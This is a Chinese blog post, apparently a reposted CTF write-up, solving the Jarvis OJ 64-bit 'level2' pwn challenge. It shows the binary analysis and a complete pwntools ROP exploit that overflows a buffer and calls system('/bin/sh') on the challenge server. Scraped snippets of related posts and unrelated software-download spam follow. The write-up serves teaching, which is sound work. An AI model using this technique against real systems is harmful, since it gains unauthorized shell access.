2. 程式人生 > 其它 >[Jarvis OJ - PWN]——[XMAN]level2(x64)

[Jarvis OJ - PWN]——[XMAN]level2(x64)

阿新 發佈:2021-02-12

技術標籤:pwn# Jarvis OJ

[Jarvis OJ - PWN]——[XMAN]level2(x64)

  • 題目地址:https://www.jarvisoj.com/challenges
  • 題目:
    在這裡插入圖片描述
    checksec一下,是64位程式。開啟了NX保護在這裡插入圖片描述
    在IDA看一下,main函式中有我們要的system函式,
    在這裡插入圖片描述
    vulnerable_function函式中也有。不過可惜引數都不對,任取一個system地址就好就好。但是我們找到了棧溢位的利用函式read。buf距離rbp的距離為0x80
    在這裡插入圖片描述
    請新增圖片描述請新增圖片描述請新增圖片描述

查詢一下看看有沒有**"/bin/sh"字串,發現地址在0x0600A90**
在這裡插入圖片描述

**因為是64位程式,所以函式的前六個引數依次會使用rdi、rsi、rdx、rcx、r8、r9暫存器進行傳遞。system只有一個引數,使用的暫存器是rdi。**查詢一下彙編指令pop rdi的地址,0x04006b3


在這裡插入圖片描述
所以exploit為

from pwn import *
p = remote("pwn2.jarvisoj.com",9882)
binsh = 0x0600A90
pop_rdi=0x04006b3
sys = 0x0400603 #0x040063E 0x04004C0 
payload = 'a'*(0x80 + 0x8)
payload += p64(pop_rdi)+ p64(binsh) #將"/bin/sh"pop到rdi暫存器中
payload += p64(sys) #執行system函式
p.recvline()
p.sendline(payload)
p.interactive(
 
)

相關推薦

[Jarvis OJ - PWN]——[XMAN]level2(x64)

技術標籤:pwn# Jarvis OJ [Jarvis OJ - PWN]——[XMAN]level2(x64) 題目地址:https://www.jarvisoj.com/challenges題目:checksec一下,是64位程式。開啟了NX保護 在IDA看一下,main函式中有我們要的system函式

[Jarvis OJ - PWN]——[XMAN]level3

技術標籤:pwn# Jarvis OJ [Jarvis OJ - PWN]——[XMAN]level3 題目地址:https://www.jarvisoj.com/challenges題目:先checksec一下,32位程式開啟了NX保護。在IDA看下。第一個函式中,有可以棧溢位利用的函式re

jarvis oj PWN - level3

思路: 1.使用write 洩漏出 got地址, 通過libc計算偏移得到system, binsh 2.覆蓋ebp返回主函式再次執行

Jarvis OJ-superexpress

下載附件後,得到了一個py指令碼與一個的文字,如下: problem.py: import sys import re

pwn-[XMAN]level5

這道題涉及很多知識點,包括64位通用gadget,mprotect修改許可權 該題假設禁用了system和execve函式

Jarvis OJ - Web

Login bp抓包,得到hint Hint: \"select * from `admin` where password=\'\".md5($pass,true).\"\'\" php中的md5函式,包含兩個引數:string(必須)、raw(可選)

pwn之棧衝區溢位漏洞X64與X86

64位pwn入門 X86與X64函式呼叫的區別 x86 X86中函式傳參是再棧中直接存放,需要時的時候出棧即可。

[攻防世界 pwn]——level2

技術標籤:# 攻防世界 [攻防世界 pwn]——level2 題目地址: https://adworld.xctf.org.cn/題目:32位程式IDA中, 找到system和 ‘/bin/sh’ 地址進行覆蓋

攻防世界PWN簡單題 level2

攻防世界PWN簡單題 level2 此題考驗的是對ROP鏈攻擊的基礎 萬事開頭PWN第一步checksec 一下

IntelliJ IDEA 2019.2 x64的安裝、應用與簡單配置(圖文)

一、Intellij IDEA的簡介 Intellij IDEA是java語言的整合開發環境,與Eclipse相比,它的功能更多、更強大、更智慧,Eclipse更適合剛學習java語言的初學者,它操作起來更簡單,而且大多數的入門教程都是使用Eclipse進

LInux下安裝MySQL5.6 X64版本步驟詳解

環境: 1.CentOS6.5 X64 2.mysql-5.6.34-linux-glibc2.5-x86_64.tar.gz 3.下載地址:http://dev.mysql.com/downloads/mysql/

mysql 8.0.15 安裝配置方法圖文教程(Windows10 X64

最近學習的內容涉及到MySQL的知識,所以安裝一個MySQL非常有必要,參考別人的教程安裝過程還算順利,其中遇到了一些問題查了一些也解決了,這裡把整個安裝過程梳理一遍,給大家一個參考。

mysql8.0 windows x64 zip包安裝配置教程

mysql 8 windows 版本zip方式安裝步驟(下載地址) 1、解壓ZIP檔案到指定目錄下:如D:\\mysql-8.0.11-winx64

Windows10 x64安裝、配置Oracle 11g過程記錄(圖文教程)

備註:本想在自己電腦上安裝個oracle練習用,但是害怕安裝過程中出現問題,而oracle的解除安裝又是出了名的麻煩,所以用虛擬機器搭建了一個跟本機一樣的系統,同時記錄下安裝的每一步。

VS2019配置OpenCV時找不到Microsoft.Cpp.x64.user的解決方法

最近在配置OpenCV的時候,由於使用的是VS2019,結果找不到Microsoft.Cpp.X64.user這個檔案。導致每次新建專案都得重新配置一遍,後來特意下載了vs2017,把下面這些檔案拷到對應目錄,就解決了。

VS2019屬性管理器沒有Microsoft.Cpp.x64.user的解決辦法

下載個VS2017 曾經在一個博主那裡看到過,嘗試過一次,安裝vs2017之後,發現vs2019的Microsoft.Cpp.x64.user又出現了。猜測安裝的vs2019沒有Microsoft.Cpp.x64.user的原因是因為裝在D盤的原因(純屬個人觀點)。

C:\php-7.4.5-nts-Win32-vc15-x64\php-cgi.exe - FastCGI 程序意外退出 問題解決 PHP Warning: 'vcruntime140.dll' 14.0 is not compatible with this PHP build linked with 14.16 in Unk

win10兩臺電腦,一臺裝了vs2019iis正常,另一臺沒裝iisphp環境出現些故障,深查原因,出現如下警告,現程式碼部分

解決 win32-x64-64_binding.node 下載失敗

# 1. 下載對應版本到本地磁碟 d:\\win32-x64-72_binding.node # 2. 設定sass路徑 set SASS_BINARY_PATH=本地磁碟路徑

windows10 ltsb x64下載_windows10 ltsb x64系統官方下載

哪裡有windows10 ltsb x64下載?整合常見硬體驅動,完全無人值守自動安裝。是一款值得推薦的軟體,但哪裡可以下載呢?下面小編就來為大家分享靠譜的windows10 ltsb x64系統官方下載地址。

win10教育版x64 iso免費下載_win1064位教育版下載地址

哪裡有免費的win1064位教育版系統下載?現在網上的下載地址非常多,就導致使用者不知道選擇哪一款。也難以辨別好壞。所以今天小編就來為大家推薦幾款好用的win1064位教育版下載地址。感興趣的也可以往下看哦。